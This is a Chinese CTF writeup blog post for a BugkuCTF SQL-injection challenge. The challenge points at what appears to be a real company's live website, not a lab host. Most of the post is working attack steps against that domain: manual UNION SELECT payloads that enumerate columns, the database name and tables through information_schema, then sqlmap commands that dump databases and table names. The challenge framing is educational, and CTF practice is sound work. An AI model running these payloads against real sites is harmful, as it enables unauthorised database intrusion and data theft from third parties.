BugkuCTF-web进阶-实战2-注入 writeup

无标签
CTF刷题
发布日期:   2019-07-14
更新日期:   2021-12-01
文章字数:   392
阅读时长:   1 分
阅读次数:  

题目描述

  • 解题传送门:http://www.kabelindo.co.id/
    在这里插入图片描述

    解题思路

    在这里插入图片描述
    打开链接后得到个这个页面,注入,,,我一开始在搜索框内随意试试,发现没什么用,抓包也没啥结果。然后就逛逛这个网站看看哪里有注入点,找了一会,在页面的About-News里面发现数字型注入,话不多说,开始
    在这里插入图片描述
    注入嘛,老套路,两种方法
  • 法一、手工注入
    猜字段http://www.kabelindo.co.id/readnews.php?id=28 order by 5正常
    在这里插入图片描述
    http://www.kabelindo.co.id/readnews.php?id=28 order by 6
    报错,字段为5
    在这里插入图片描述
    看字段回显(记得把id置为无用数值,不然会掩盖后面的查询结果)
    http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,2,3,4,5
    在这里插入图片描述
    暴数据库http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,database(),3,4,5
    得到数据库u9897uwx_kabel
    在这里插入图片描述
    暴表名http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()
    在这里插入图片描述
    这个表太多了,没法全部显示,我们只需要查看源码即可,表在‘3’的前面
    在这里插入图片描述
  • 法二、sqlmap
    可以抓包,salmap扫描包,也可以直接扫描网站,都可以,这里我就扫描网站吧,懒得抓包,存txt了
    暴数据库sqlmap.py -u www.kabelindo.co.id/readnews.php?id=28 --dbs
  • -dbs(两个-) –>查询当前数据库
    得到数据库u9897uwx_kabel
    在这里插入图片描述
    暴表名sqlmap.py -u www.kabelindo.co.id/readnews.php?id=28 -D u9897uwx_kabel --tables
  • D –>指定数据库
  • -tables(两个-) –>查询当前数据库的表名
    得到最后一个表名tbnomax
    在这里插入图片描述

    得到FLAG

    flag{tbnomax}

END

文章作者: yq1ng
文章链接: http://yq1ng.github.io/2019/07/14/bugkuctf-web-jin-jie-shi-zhan-2-zhu-ru-writeup/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yq1ng !
无标签
评论
  目录